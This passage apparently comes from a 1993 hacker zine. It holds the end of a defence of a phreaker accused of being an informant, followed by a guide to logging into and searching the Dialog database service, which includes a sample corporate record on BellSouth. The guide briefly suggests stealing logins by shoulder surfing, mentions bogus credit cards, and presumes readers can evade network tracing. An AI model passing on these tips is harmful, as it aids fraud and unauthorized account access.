  13075. are a neighborhood vandle, your less likely to bother an authority figure.  To
  13076. them Visionary was an authority figure.
  13077.  
  13078.  
  13079.      That was not the only ocation Visionary had let people believe he was
  13080. an informent of some kind.  Visionary found it was easier in some instances
  13081. if certain people were set on believing the rumors, that they were better off
  13082. deceived in that way.  Certain people, Visionary found would trust him more if
  13083. they thought he worked for a certain ld service.  One particular instance,
  13084. involved a local friend of Visionary's.  The kid, had heard a lot of rumors.
  13085. Visionary had got him started in the shit, but what convinced the kid was the
  13086. famous MCI tape.  Visionary, finally told the kid he worked for MCI, and no
  13087. government agency.  When the kid in question heard this he was able to talk
  13088. to Visionary easier.  The logic here, is the kid didn't know what Visionary did.
  13089. If he did work for the FBI or Secret Service, he felt in danger by that.  But
  13090. As the local kid didn't use MCI it made him trust Visionary.  See people there
  13091. was the same reason Visionary told several people that.  People, like that kid
  13092. as well as others didn't care what Visionary did.  Also Visionary at times
  13093. would bolshit someone into thinking he was a government narc to get a reaction.
  13094. "You would be suprised as to the number of people who actually wanted to narc,"
  13095. was Visionary's statement.
  13096.  
  13097.  
  13098.      Over the years Visionary has been the target of many a accuation.  Many
  13099. of those who know Visionary, know he is no narc, and never has been.  Visionary,
  13100. feels that people have been to quick to judge him, and he asks to just keep
  13101. an open mind.  The rumors about him are bolshit, as a number of facts will show.
  13102. The facts which are a lot more credible stand a lot stronger than the rumors.
  13103. 1.  Many people Visionary has associated with have not been busted.  This
  13104. statement may not mean a thing, but it's going to be ovious if he is a narc a
  13105. lot of his friends would go down.  Visionary talks to everybody, therefore  you
  13106. know that he will know some who have been busted.  But the number are few, and
  13107. when you talk to several who have known him, they will admit no Secret Service
  13108. or FBI have shown up to get them.  Logic to some may not dictate reality, but
  13109. it makes sense and has proven to be true.  Take a look at people like, Fourth
  13110. Reich, Gandalf, Lord Sigath, Hellmaster, The Phlaw, Renegade and Weirdo.
  13111. All the people have been around for a long time, and associated with Visionary.
  13112. So ask yourself, why, if Visionary is a narc are they not busted?  The answer
  13113. is plane as day.
  13114.  
  13115.      There is one major thing that needs to be covered in this file.  The event
  13116. I am refering to happened during the sumer of 1990.  It waa around the time of
  13117. the 702 bridge.  There was a guy going by the handle of Storm Shadow around.
  13118. Storm Shadow lives in the New York area and Storm ShadowVisionary first knew
  13119. Storm Shadow in late 1989.  Some people that knew this guy would say he was a
  13120. bolshit artist, who didn't come through.  Storm Shadow had aproached several
  13121. people he knew with a deal involving information providers.  The deal was he
  13122. worked for a private investigator.  The type of work Storm Shadow clamed to be
  13123. doing was nonhacker related cases.  He clamed it was just people he needed to
  13124. obtain records on various things such as, Social Security records, local usage
  13125. dialing records, CBI and TRW records, LD records as well as other things.  He
  13126. made offers to a number of people like Visionary, Toxic Roadkill, Code of Honor,
  13127. Nemesis, Joe Friday, Billy The Kid as well as others to work for him.
  13128. When he tried to get Visionary involved, he didn't have a lot for it.  Storm
  13129. Shadow asked Visionary to find people to help him out.  Visionary introduced
  13130. Storm Shadow to a few people explaining what Storm Shadow's problem.  At this
  13131. point Visionary just left it up to the people.  One thing that should be
  13132. understood, is Visionary had no notion that Storm Shadow wasn't anything beyond
  13133. what he said.  Some of the people like Toxic Roadkill, Joe Friday and Code of
  13134. Honor did do some work for Storm Shadow.  This thing went on for a few months
  13135. ooff and on from late 1990 into 1991.
  13136.  
  13137.  
  13138.      Recently certain things came to light regarding Storm Shadow.  In the fall
  13139. of 91, there were a few people busted in the New York area.  Storm Shadow and
  13140. a guy known as Renegade Hacker were among the people.  It appears Storm Shadow
  13141. is a witness for the government against some of the others busted.  It's
  13142. been thought by a couple, that Storm Shadow was gathering evidence against the
  13143. people he tried to get working for him.  This in itself didn't make Visionary
  13144. look very good, as he introduced Storm Shadow to a number of people.  You see
  13145. once again, Visionary is going to get blamed wrongfully for something not in
  13146. his control.
  13147.  
  13148.  
  13149.      Gentleman, after reading the accounts above you may understand Visinary's
  13150. anger when someone calls him a narc.  Rather by his own falt, or just the
  13151. manor of things, Visinary has not been treated fairly by the HP communinity.
  13152. It's not fair that people look at him differently.  Just because he may not be
  13153. like everyone else is no excuse.
  13154.  
  13155.  
  13156.      Recently, people have been spreading a lot of rumors without hearing
  13157. Visionary's side.  Recently, people will produce what they call evidence without
  13158. allowing him to explain.
  13159.  
  13160.  
  13161.      A lot of statements, and information have been passed among people, that
  13162. when you look at it means nothing.  People say they've got Visionary on tape
  13163. admitting he's a narc.  Visionary has bolshited people before, and the plane
  13164. fact is someone was taping him.  People will bring up the fact Visionary has not
  13165. been busted.  Just because the guy hasn't been busted doesn't mean anything.
  13166. Visionary is not always active, therefore isn't always at risk.  Some people t
  13167. will wonder why someone Visionary's age, 27 years old is in this stuff.  Some of
  13168. the most wellknown hackers are in their twentys, and some are even in the
  13169. early thirtys.
  13170.  
  13171.  
  13172.      One major fact, that has been brought up about Visionary will be addressed
  13173. now.  Some people, with good reason, may want to know the reason behind this
  13174. major fact regarding Visionary.  One question, that has come up from time to
  13175. time, is what does Visionary specialize in relation to hacking.  Some wonder
  13176. what Visionary does in the hack/phreak world.  Gentleman remember Visionary is
  13177. handicapped as well as visually impaired.  Being blind kind of makes his
  13178. resources kind of limited in reading files.  He uses an Echo Speach Card with
  13179. limited software.  Not just any program will work with the speach card.  The
  13180. Echo takes text and speaks it OK to a point.  But when reading stuff from a
  13181. text file, the words are not spoken properly.  Some symbols aren't pronounced
  13182. therefore making things even harder.  When on a Unix system it's rough because
  13183. the commands aren't spoken like they should be.  The main thing Visionary is
  13184. good at is the social enginering aspect.
  13185.  
  13186.  
  13187.      Let's keep in mind no matter how someone goes about learning, it does make
  13188. them any different different.  Visionary should be looked upon as a shady
  13189. character just because he may be curious.  He has to learn by asking questions,
  13190. where all of us take the ability of reading for granted.
  13191.  
  13192.  
  13193.     The reason this file is being widely spread, is in hopes some of the
  13194. slandering of Visionary's name can stop.  "The computer and the telephone are
  13195. my best sources of entertainment.  I enjoy hacking as a hoby and do not
  13196. appreciate the continuing rumors people spread."  fter
  13197.  
  13198.  
  13199.     The main thing here, is every time some strange event happens in the seen,
  13200. people point the finger at Visionary.  Let's stop the shit, let's stop assuming
  13201. he's the guilty one.  Recently Visionary was blamed for a bunch of people being
  13202. on Alliance Teleconferencing.
  13203.                               ==Phrack Magazine==
  13204.  
  13205.                  Volume Four, Issue Forty-Four, File 18 of 27
  13206.  
  13207. ****************************************************************************
  13208.  
  13209.                   Searching the Dialog Information Service
  13210.                                By Al Capone
  13211.                       (alcapone@mindvox.phantom.com)
  13212.  
  13213.      This file will show you how to use the Dialog Information Service.
  13214. It is divided into the following parts:
  13215.  
  13216. <> --- Background Information
  13217. <> --- Accessing Dialog
  13218. <> --- What to do when you're in
  13219. <> --- Searching and Search Strategy
  13220.  
  13221.      As loyal Phrack readers may recall, there have been two articles
  13222. written about Dialog already: Control-C wrote "Inside Dialog" in Issue
  13223. 9 and much later Brian Oblivion wrote "The Complete Guide to The DIALOG
  13224. Information Network" in Issue 39. Why another one? The online world
  13225. changes so rapidly that things written just a couple of years ago can
  13226. be out of date today. What differentiates this file from its two predecessors
  13227. is that this file is: less 'manual derived', current (as of 11/93),
  13228. more hands on, and hopefully is easier to read and put to immediate use.
  13229.  
  13230.      To obtain additional information about Dialog contact:
  13231.  
  13232.                   Dialog Information Service Worldwide Headquarters
  13233.                   3460 Hillview Avenue
  13234.                   P.O. Box 10010
  13235.                   Palo Alto, CA 94303-0993
  13236.                   Phone: 1-800-3-DIALOG (800-334-2564)
  13237.  
  13238.  
  13239. <> Background Information
  13240. -------------------------
  13241.  
  13242. "The United States is turning from an industrial age nation into
  13243. an information age nation,"  U.S. Senator Gary Hart, The Tonight
  13244. Show, 1993.
  13245.  
  13246.      From Big Brother creating dossiers on subversives to credit
  13247. reporting agencies determining whether or not you get your credit
  13248. card application approved, it all boils down to the more you know,
  13249. the better you are able to succeed in society.
  13250.  
  13251.      Following through a hacker progression, huge databases have
  13252. amassed providing online access to a seemingly infinite number of
  13253. sources used for anything imaginable.  Lawyers can access these
  13254. databases to research such things as precedents for court cases. A
  13255. graduate student trying to earn his or her masters degree can gain
  13256. access to research a thesis, companies can get information on
  13257. competitors, and so on. Databases are distributed into two categories:
  13258. Research and Entertainment.
  13259.  
  13260.      Gaining prominence in the early 1980's, entertainment databases
  13261. were comprised of the big two: The Source and Compuserve. Another
  13262. prominent service, the Dow Jones News Retrieval Service was part
  13263. research and part entertainment.  A few other less significant databases
  13264. also existed at this time.
  13265.  
  13266.      The Source was a subsidiary of the investment firm of Welsh,
  13267. Carson, and Stowe.  It provided some seven hundred and fifty features
  13268. and services including electronic mail.  Investment features included
  13269. a discount brokerage firm, and a full range of stock, bond, and
  13270. commodities information, with an option to search portfolios.  It also
  13271. allowed you to search other fellow users by location, account number,
  13272. or interest.  The Source was subsequently bought out by Compuserve
  13273. and was shutdown on August 1, 1989.
  13274.  
  13275.      Compuserve is a division of H&R Block. It is the largest
  13276. service worldwide offering some four hundred thousand subscribers a
  13277. variety of news and financial information.  It also offers access
  13278. to Valueline and the Standard and Poor databases, which are online
  13279. business references.  It also has online games and a travelling service.
  13280.  
  13281.      The Dow Jones News/Retrieval is a part of the Wall Street Journal
  13282. and provides online abstracts of printed papers published by Dow
  13283. Jones and Co.  It now includes profiles of over forty six hundred
  13284. companies and has diversified to provide sports coverage.
  13285.  
  13286.      Today, most of you are aware of the myriad of other entertainment
  13287. online services such as Genie, Prodigy, America OnLine (AOL), etc. All
  13288. of these so called entertainment services have made attempts at
  13289. offering various business and research services to their users. Its
  13290. interesting to sit back and watch how each one tries to out-do the
  13291. other. You will find that some databases are offered through some of
  13292. these entertainment services as well as dialog and perhaps other
  13293. commercial services. Be aware that the costs may differ substantially
  13294. among them for the same exact database. If you are paying for access, be
  13295. sure to shop around if the particular database is popular.
  13296.  
  13297.      If you travel to your local university library you will notice
  13298. computer databases to which you can access such things as doctoral
  13299. dissertations (get brownie points by telling your professor how
  13300. interesting his/her thesis was), medical research (look up that newly
  13301. acquired disease that your doctor mumbled that you now have), even
  13302. national newspaper articles. This is just another source of information
  13303. at your disposal (aside from books that is).  Popping up more and
  13304. more in libraries are "fee based research services".  These are simply
  13305. professional librarians who use research databases to retrieve the
  13306. information you are too ignorant or stupid (or don't have enough time)
  13307. to retrieve yourself. Fees range from their cost only (ie, online charges)
  13308. to upwards of $100. per hour of their time spent PLUS any online
  13309. charges.
  13310.  
  13311.      As you can probably deduce, it would be cost effective to use every
  13312. possible free source of information before turning to online searchers.  I
  13313. recommend exhausting all the in-library databases before going online
  13314. simply because the in-library databases are usually available on
  13315. CD-ROM and you are not charged an hourly rate to use it. And don't
  13316. forget about all those free Internet FTP sites, Gopher, WAIS, WWW, and
  13317. even usenet!  Most librarians are just starting to pay attention to and make
  13318. use of the Internet. However once you have read this article you
  13319. will be well versed on one of the major databases that is being used by
  13320. these research services.  If you run into an online database
  13321. in your library, I suggest that you know what you are doing, as
  13322. librarians are very skeptical due to the fact that you are using their
  13323. money to do your searching.
  13324.  
  13325.      Running a research service seems to be a good idea.  Not
  13326. only does it provide a "legal" form of hacking to satisfy your
  13327. thirst for information, there is definitely a substantial amount of
  13328. money to be made.  Entrepreneur magazine lists it as being in the top
  13329. ten of prospective business opportunities.  You are professionally
  13330. known as an information broker, a degree in Library Studies (a
  13331. traditional four year degree) helps, and if you don't decide to pursue
  13332. the research angle, you could then become a librarian (how exciting).
  13333.  
  13334.      One of the research databases commonly used is the Dialog
  13335. Information Service.  Dialog is a subsidiary of Lockheed Missile and
  13336. Space Corporation.  It provides access to more than three hundred
  13337. databases containing over one hundred million records.  The
  13338. significance of this service is that it joins all 300+ databases
  13339. together, you can skip from one database to another simply by
  13340. 'beginning' the database.  In the past, the user would have to
  13341. individually call each database and pay an exorbitant charge to
  13342. use it.  Dialog eliminates this and keeps all the databases
  13343. together.  Because of the vastness, all sources are summarized
  13344. with keyword searches.  Dialog has substantial signup charges
  13345. ($295. last time I asked them) in addition to the fact that
  13346. each individual database charges an hourly rate.  Each rate varies
  13347. according to things like the relative importance of the topic,
  13348. cost to put the information online, and the main determining
  13349. factor: what they think the users will pay. Some database
  13350. providers seem to defy any logical reasoning as to how they
  13351. determined the cost to access their information.
  13352.  
  13353.   Dialog can be accessed in about a dozen different ways.  It is
  13354. available through Westnet, Wangpac, Dunsnet, IBM Information Network, and
  13355. TWX-TELEX.  The following chart lists some other alternatives along
  13356. with connection rates:
  13357.  
  13358.                Ways to Access Dialog with Connection Rates
  13359.                                Table 1
  13360.  
  13361. +--------------------------------------------------------------------------+
  13362. |         Service                           Rate per Hour (U.S.Dollars)    |
  13363. |         -------                           ---------------------------    |
  13364. |                                                                          |
  13365. | Dialnet Direct Dial (Palo                                                |
  13366. |   Alto Dialnet Nodes).................................$ 4.00             |
  13367. |                                                                          |
  13368. | Dialnet-In Watts (Direct 800#)........................$24.00             |
  13369. |                                                                          |
  13370. | GEIS-Marknet *........................................$25.00             |
  13371. |                                                                          |
  13372. | GNS (Global Network Services -                                           |
  13373. |   BT Tymnet) **.......................................$12.00             |
  13374. |                                                                          |
  13375. | Internet Gateway..(ANSnet)............................$ 4.20              |
  13376. |                                                                          |
  13377. | Journal of Commerce (JOC and                                             |
  13378. |    KRU Network) ***...................................$24.00             |
  13379. |                                                                          |
  13380. | Sprintnet (Formerly Telenet)..........................$12.00             |
  13381. |                                                                          |
  13382. |                                                                          |
  13383. +--------------------------------------------------------------------------+
  13384. *    = Available for users in Australia, New Zealand, Hong Kong, Singapore,
  13385.        and the Philippines.
  13386. **   = Available in Europe.
  13387. ***  = Available in the Far East and Asia.
  13388.  
  13389.  
  13390. <> - Accessing Dialog
  13391. ---------------------
  13392.      The following three scenarios will show you how to log in
  13393. to Dialog to begin your searching. [] denunciates what you
  13394. should type in:
  13395.  
  13396. 1. - Accessing Dialog through the Internet via the telnet command:
  13397. ------------------------------------------------------------------
  13398.  
  13399. $ Telnet dialog.com
  13400.  
  13401. DIALOG INFORMATION SERVICES
  13402. PLEASE LOGON:
  13403. ?XXXXXXXX [Enter the Dialog Usernumber]
  13404. ENTER PASSWORD:
  13405. ?XXXXXXXX [Enter the Dialog Password]
  13406.  
  13407. You're In!
  13408.  
  13409. 2. - Accessing Dialog through Tymnet
  13410. ------------------------------------
  13411. [a]
  13412. please log in:[dialog]
  13413. DIALOG: call connected
  13414. DIALOG INFORMATION SERVICES
  13415. PLEASE LOGON:
  13416. ?XXXXXXXX [Enter the Dialog Usernumber]
  13417. ENTER PASSWORD:
  13418. ?XXXXXXXX [Enter the Dialog Password]
  13419.  
  13420. You're In!
  13421.  
  13422. 3. - Accessing Dialog through Sprintnet
  13423. ---------------------------------------
  13424. [Enter]  [Enter]  [Enter]
  13425. TELENET
  13426. 123 45K
  13427. @ [41548]
  13428. 415 48 connected
  13429. DIALOG INFORMATION SERVICES
  13430. PLEASE LOGON:
  13431. ?XXXXXXXX [Enter the Dialog Usernumber]
  13432. ENTER PASSWORD:
  13433. ?XXXXXXXX [Enter the Dialog Password]
  13434.  
  13435. You're In!
  13436.  
  13437.      Here let me say a few things about getting a correct
  13438. logon/password combination.  In order to familiarize yourself
  13439. with the system, Dialog gives you a starter kit which includes
  13440. your legit logon/password, along with some other perks like some
  13441. free online time.  This online time can be used the minute you
  13442. get your starter kit.  You may also illicitly obtain a correct
  13443. logon/password combination using such an elaborate technique as
  13444. looking over the shoulder of the person typing it in (shoulder
  13445. surfing).
  13446.  
  13447.      Of course Dialog will immediately revoke the 'hacked' account the
  13448. minute that the "scheme" is uncovered, but at least you will have by then
  13449. done your research and quietly slipped away.  Keep in mind that network
  13450. nodes send port identifiers and if you are using a bogus credit
  13451. card, then you might be in some hot water should they decide to
  13452. track you down. It is assumed that if you intend to gain unauthorized
  13453. access, you are somewhat versed in the various methods to negate
  13454. the 'tracing' capability of the network(s).
  13455.  
  13456.      Dialog offers 6 'free' accounts to prospective and current
  13457. subscribers.  These are restricted accounts which provide access
  13458. to their ONTAP training databases. There are two to three dozen
  13459. databases which they scale down to include a fraction of the
  13460. number of records and/or contain dated records from years ago. You
  13461. search these databases the same way as the full-scale ones.  The
  13462. purpose is for you to verify your search strategy, and once you feel
  13463. confident that your search strategy will pull up the info you want
  13464. (not too many records yet not too little), you use your dialog
  13465. account to access the same database at the going rate. This way,
  13466. you don't lose lots of cash if you screw up, because you made all
  13467. your mistakes using the free accounts. Since I use the free accounts
  13468. on occasion, I don't think it would be a good idea to list them in
  13469. this file. Suffice it to say that Dialog is happy to provide the
  13470. phone number to you that has the pre-recorded userid and password
  13471. combinations for the ONTAP accounts. Note that these passwords are
  13472. changed every month, with new passwords being provided at the first of
  13473. each month and that only one person may use each account at a time.
  13474.  
  13475.      Also note that Dialog occasionally offers a 'free file of the
  13476. month' in which you use your normal Dialog account to do searches in
  13477. the particular database. They usually allow you to rack up to $50 or
  13478. sometimes an hour's worth of search charges -- I guess that is Dialog's
  13479. definition of 'free'. The only charges you pay when you access any free
  13480. files of the month are telecommunications charges (see Table 1 above).
  13481. Once you leave the free file of the month, you will start to incur
  13482. normal Dialog online time charges.
  13483.  
  13484.  
  13485. <> What to do When You're In
  13486. ----------------------------
  13487.  
  13488.      Once you have gained access to Dialog the system will show
  13489. you something like this:
  13490.  
  13491. Welcome to DIALOG
  13492. Dialog level 29.01.04B
  13493. Logon file227 22may93 12:27:30
  13494.  
  13495. COPR. (c) DIALOG INFORMATION SERVICES, INC. ALL RIGHTS RESERVED.
  13496. NO CLAIM TO ORIG. U.S. GOVT. WORKS.
  13497. ***Equal Employment Opportunity (EEO) Data Available in CENDATA
  13498.    Menu 22.7
  13499.  
  13500. ***Preformatted Patent REPORTS are now available for File 28,351
  13501.  
  13502. New: CINCINATTI/KENTUCKY POST (PAPERS) (File 722)
  13503. New: ST. PETERSBURG TIMES (File 735)
  13504. New: WICHITA EAGLE (PAPERS) (File 723)
  13505.  
  13506. >>> Enter BEGIN HOMEBASE for Dialog Announcements <<<
  13507. >>>       of new databases, price changes, etc.   <<<
  13508. >>>        Announcements last updated 07may93     <<<
  13509.  
  13510. SYSTEM:
  13511.  
  13512.      The "SYSTEM:" prompt directs you to pick a file.  A file in
  13513. this case is the number to a database.  In the above welcome message
  13514. you will notice that the St. Petersburg Times appears in File 735.
  13515. This simply means that if I wanted to look up an article in the St.
  13516. Pete Times, I would type in "b735" at the "SYSTEM:" prompt.  The "b"
  13517. stands for begin, as if you are beginning in that database.  Like I
  13518. said earlier, each database charges a different rate which typically
  13519. depends on the 'importance' of the information.  Therefore, it will
  13520. probably charge more for biochemistry information than for newspaper
  13521. articles. The following list shows costs for the some of the "A" databases
  13522. in the Dialog system.
  13523.  
  13524.      HOMEBASE is the Dialog tutorial.  It provides all sorts of help
  13525. needed by the beginner hacker...errr user.  Homebase lists announcements,
  13526. dates and locations of training seminars ($70 to $140 for half/full day
  13527. seminars, I have been to a few for dialog and some of their individual
  13528. databases and highly recommend going especially if they are offered for
  13529. free), and lists dialups in various area codes.
  13530.  
  13531.                Individual Dialog databases by the Letter A
  13532.                                Table 2
  13533.  
  13534. +--------------------------------------------------------------------------+
  13535. |  File Number  |          Database Name         |  Rate per Minute/Hour   |
  13536. |---------------|--------------------------------|-------------------------|
  13537. |    15         |           ABI/Inform           |         2.20/132.00     |
  13538. |    88         |         Academic Index         |         1.40/84.00      |
  13539. |    108        |         Aerospace Database     |         1.50/90.00      |
  13540. |    163        |           AGELINE              |         1.00/60.00      |
  13541. |    581        |         Agribusiness U.S.A.    |         1.60/96.00      |
  13542. |    10         |         Agricola 1979-present  |          .75/45.00      |
  13543. |    110        |         Agricola 1970-1978     |          .75/45.00      |
  13544. |    203        |         Agris International    |         1.00/60.00      |
  13545. |    306        |     The Agrochemicals Handbook |         4.41/265.00     |
  13546. |    157        |         AIDSline 1980-         |          .60/36.00      |
  13547. |    708        |       Akron Reacon Journal     |         1.60/96.00      |
  13548. |    38         |     America:History and Life   |         1.08/65.00      |
  13549. |    625        |     America:Banker Full Text   |         2.00/120.00     |
  13550. |    Banknews   |     American Banker News       |         2.00/120.00     |
  13551. |    460        |     American Library Directory |         1.25/75.00      |
  13552. |    236        |American Men and Women of Scien.|         1.58/95.00      |
  13553. |    305        |        Analytical Abstracts    |         2.66/160.00     |
  13554. |    257        |     API Energy Business News   |         1.60/96.00      |
  13555. |    897        |     API Energy Business News   |         1.60/96.00      |
  13556. |    354        |     APILIT (non-subscriber)    |         3.08/154.00     |
  13557. |    954        |     APILIT (Subscriber)        |         1.83/110.00     |
  13558. +--------------------------------------------------------------------------+
  13559.  
  13560.      This list continues for some fifteen more databases (those
  13561. that start with the letter A).  If I were to list the entire database
  13562. list, this covers some ten pages of documents, not withstanding
  13563. that it's constantly being revised/updated.  If you look at my example
  13564. in logging on, the St. Petersburg Times was recently added as a database.
  13565. This would not reflect in my database list as I have compiled, outdating
  13566. it before I even listed it.  I suggest that you contact Dialog at the
  13567. phone/address at the beginning for an updated list of databases.  The
  13568. document is called "Price List".  However Dialog has online an entire
  13569. list of all its databases.  This list is located in File 411.
  13570.  
  13571.      Also contained in this list is the Dun and Bradstreet databases
  13572. (Files 514 through 522).  Dun and Bradstreet provides corporate
  13573. information to subscribers.  It can be used for anything from
  13574. competitive intelligence on another business to credit reports on
  13575. prospective clients to background intelligence.  File 519 contains full
  13576. disclosure on financial information on a company.  Each record costs $106.
  13577. (at this time).  The other databases are significantly cheaper, but not
  13578. by much. The way D&B gathers this information is they send out employees to
  13579. "interview" various corporations and their officers and simply translate
  13580. the info into a record which they then market.  One thing about each database
  13581. is that they each contain their own language within the general Dialog
  13582. language (which will be discussed further in this file).  In Dun and
  13583. Bradstreet you can search by company, PIC and SIC codes (these are simply
  13584. manufacturing categories which the searcher can use to find companies.
  13585. Example: if I wanted to find the top ten companies in long-distance
  13586. services, I could use a PIC code), or various other categories.
  13587.  
  13588.      The following is an exploration of Phrack's old buddies, BellSouth:
  13589.  
  13590. $ s dp=10-667-8006
  13591. $ t s2/co/all
  13592.  
  13593. (The "dp" command displays all subsidiaries of a company (only the
  13594. direct subsidiaries, the ones that report directly to BellSouth.  The
  13595. result is the following:)
  13596.  
  13597. Company
  13598. Name
  13599. --------------------------------
  13600.  
  13601. Mobil Communications Corp
  13602. Bellsouth DC Inc
  13603. American Cellular Communications
  13604. Bellsouth Enterprises Inc
  13605. Bellsouth Financial Services
  13606. Bellsouth Advertising & Publishing
  13607. Mobile Communications Corporation
  13608. Mobilecomm of Nashville, Inc.
  13609. Bellsouth Telecommunications
  13610.  
  13611. Here is the record disclosure from File 516: D&B Market Identifiers:
  13612.  
  13613. 2655560   DIALOG File 516:  D&B Duns Market Identifiers
  13614. Bellsouth Corporation
  13615. 1155 Peachtree St Ne
  13616. Atlanta, GA 30367-6000
  13617.  
  13618. TELEPHONE: 404-249-2000
  13619. COUNTY: Fulton      MSA: 0520 (Atlanta, GA)
  13620. REGION: South Atlantic
  13621.  
  13622. BUSINESS: Telecommunications Services
  13623.  
  13624. PRIMARY SIC:
  13625.  4813       Telephone communication, except radio
  13626.   48130000   Telephone communication, except radio, nsk
  13627.   48130102   Local telephone communications
  13628.   48130103   Long distance telephone communications
  13629.   48130104   Voice telephone communications
  13630.  
  13631. SECONDARY SIC(S):
  13632.  4812       Radiotelephone communication, nsk
  13633.   48129901   Cellular telephone services
  13634.   48129902   Paging services
  13635.  2741       Miscellaneous publishing, nsk
  13636.   27410304   Directories, telephone: publishing only, not printed on site
  13637.  5065       Electronic parts and equipment, nec, nsk
  13638.   50650100   Telephone and telegraphic equipment
  13639.   50650103   Telephone equipment
  13640.  
  13641. LATEST YEAR ORGANIZED:  1983   OWNER CHANGE DATE:          NA
  13642. STATE OF INCORPORATION:  GA    DATE OF INCORPORATION: 10/13/1983
  13643. ANNUAL SALES REVISION DATE: 04/19/1993
  13644.  
  13645.                          LATEST             TREND             BASE
  13646.                            YEAR              YEAR             YEAR
  13647.                                            (1991)           (1989)
  13648.  
  13649. SALES          $ 15,201,600,000   $ 14,445,500,000   $ 13,600,000,000
  13650. EMPLOYEES TOTAL:         97,100             96,975            102,000
  13651. EMPLOYEES HERE:             982
  13652.  
  13653.   SALES GROWTH:  6   NET WORTH: $ 11,996,800,000
  13654.   EMPLOYMENT GROWTH:  -5
  13655.  
  13656. SQUARE FOOTAGE:  480,000  OWNED
  13657. NUMBER OF ACCOUNTS: NA
  13658. ACCOUNTING FIRM: Coopers & Lybrand Atlanta GA
  13659. BANK: Chase Manhattan Bank NA Inc  BANK DUNS: 00-698-1815
  13660.  
  13661. THIS IS:
  13662.  
  13663.     A  HEADQUARTERS LOCATION
  13664.     AN ULTIMATE LOCATION
  13665.     A  CORPORATION
  13666.     A  PUBLIC COMPANY
  13667.     A  MILLION DOLLAR DIRECTORY COMPANY
  13668.  
  13669. DUNS NUMBER:             10-667-8006
  13670. CORPORATE FAMILY DUNS:   10-667-8006
  13671.  
  13672. CHAIRMAN:                   Clendenin, John L  /Chb-Pres-Ceo
  13673. PRESIDENT:                  Clendenin, John L  /Chb-Pres-Ceo
  13674. VICE PRESIDENT:             O Neill, Robert W  /Vp Assoc Gen Counsel
  13675.                             Markey, David J  /Vp-Govt Affairs
  13676.                             Fiedler, Mark L  /Vp-Corp Development
  13677.                             Gunter, John R  /V Pres-Corp Responsibility & C
  13678.                             Casey, Patrick H  /V Pres-Comptroller
  13679.                             Yokley, Arlen G  /V Pres-Sec-Treas
  13680. SECRETARY:                  Yokley, Arlen G  /V Pres-Sec-Treas
  13681. TREASURER:                  Yokley, Arlen G  /V Pres-Sec-Treas
  13682. VICE-CHAIRMAN:              Holding, Harvey R  /V Chb-Finance &
  13683.                              Administration
  13684.                             McCoy, William O  /V Chb
  13685. COUNSEL:                    Alford, Walter H  /Exec V Pres-Gen Counsel
  13686. FINANCE:                    Holding, Harvey R  /V Chb-Finance @
  13687.                              Administration
  13688. RESEARCH AND DEVELOPMENT:   Fiedler, Mark L  /Vp-Corp Development
  13689. EXECUTIVE VICE PRESIDENT:   McGuire, Raymond L  /Exec V Pres-Govt Affairs
  13690.                             Alford, Walter H  /Exec V Pres-Gen Counsel
  13691.                             Mauldin, Earle  /Exec Vp & Cfo
  13692. SENIOR VICE PRESIDENT:      Reddersen, William F  /Sr Vp-Broadband
  13693.                              Strategies
  13694. CHIEF EXECUTIVE OFFICER:    Clendenin, John L  /Chb-Pres-Ceo
  13695. ADMINISTRATION:             Reddersen, William F  /Sr Vp-Broadband
  13696.                              Strategies
  13697.                             McCoy, William O  /V Chb
  13698.                             McGuire, Raymond L  /Exec V Pres-Govt Affairs
  13699.                             Mauldin, Earle  /Exec Vp & Cfo
  13700.                             Holding, Harvey R  /V Chb-Finance &
  13701.                              Administration
  13702. CHIEF FINANCIAL OFFICER:    Mauldin, Earle  /Exec Vp & Cfo
  13703. MANAGEMENT:                 O Neill, Robert W  /Vp Assoc Gen Counsel
  13704. SALES-MARKETING VP:         Gunter, John R  /V Pres-Corp Responsibility & C
  13705. FINANCE VP:                 Casey, Patrick H  /V Pres-Comptroller
  13706. ENGINEERING VP:             Fiedler, Mark L  /Vp-Corp Development
  13707.  
  13708.  
  13709. Record 519 goes on and displays news and personal information on
  13710. the executive officers, including the following:
  13711.  
  13712.      At divestiture, AT&T transferred to this corporation its 100
  13713. ownership in South Central Bell Telephone Company, Southern Bell Telephone
  13714. and Telegraph Company and Bellsouth Mobility Inc.
  13715.      Shareholders of AT&T as of Dec 30 1983 received one share of
  13716. Bellsouth stock for every 10 common shares of AT&T stock.
  13717.      Business started 1983.  The common stock is listed on the New York,
  13718. Boston, Midwest, Pacific and Philadelphia stock exchanges under the symbol
  13719. "BLS".  As of Jan 31 1993, there were 1,286,670 shareholders of record. The
  13720. majority of the outstanding common stock is owned by the general public.
  13721. Officers and directors own less than 1 of the outstanding stock.
  13722.       ............RECENT EVENTS.........
  13723.       In Jan 1992, the company and RAM Broadcasting Corporation formed a
  13724. business venture to own and operate certain mobile data communications
  13725. networks worldwide as well as certain cellular and paging operations in the
  13726. US  (Further details on file at the Woodbury, NY office of Dun & Bradstreet).
  13727.      During 1992, the company made several small acquisitions, principally
  13728. related to cellular phone service.
  13729.      On Sep 20 1991, the company acquired several properties in Indiana,
  13730. Wisconsin and Illinois from McCaw Cellular Communications, Inc in exchange
  13731. for $361 million, including BellSouth's interest in Rochester, NY's
  13732. non-wireline cellular provider.
  13733.      On Sep 17 1991, the company completed the acquisition of Graphic
  13734. Scanning Corp for an adjusted total cash purchase price of $168 million.
  13735. In addition, certain liabilities of Graphic Scanning amounting to
  13736. approximately $142 million were assumed by BellSouth.
  13737.     On Mar 28 1991, the company acquired from GTE Mobilnet Incorporated
  13738. two cellular partnerships in which it held minority interests, which
  13739. resulted in BellSouth Enterprises, Inc gaining an additional 21 interest
  13740. in the Atlanta-Athens Limited Partnership and an additional 42 interest in
  13741. the Lexington, Kentucky MSA Limited partnership.
  13742.  
  13743.      ........MANAGEMENT BACKGROUND........
  13744.      CLENDENIN born 1934 married.  1955 Northwestern University BS.
  13745. 1955-1978 Illinois Bell Telephone Co, Chicago, IL.  1975 Vice President.
  13746. 1978-1980 Pacific Northwest Telephone Co, Seattle, WA, Executive Vice
  13747. President.  1980-1981 AT&T Vice President.  1981 Southern Bell Telephone.
  13748. 1984-present Chairman of Board, President, and CEO, Bellsouth Corporation.
  13749.      MCCOY born 1933.  Graduate of University of North Carolina, 1955 BS,
  13750. BA and MIT and 1968 MS Management.  1955-1959 U S Marine Corps. 1959-present
  13751. BellSouth Corporation; 1993 Vice Chairman, BellSouth Corporation.
  13752.      YOKLEY born 1937.  Graduate of Catawba College, Salisbury, NC 1959.
  13753. 1959 joined subject.
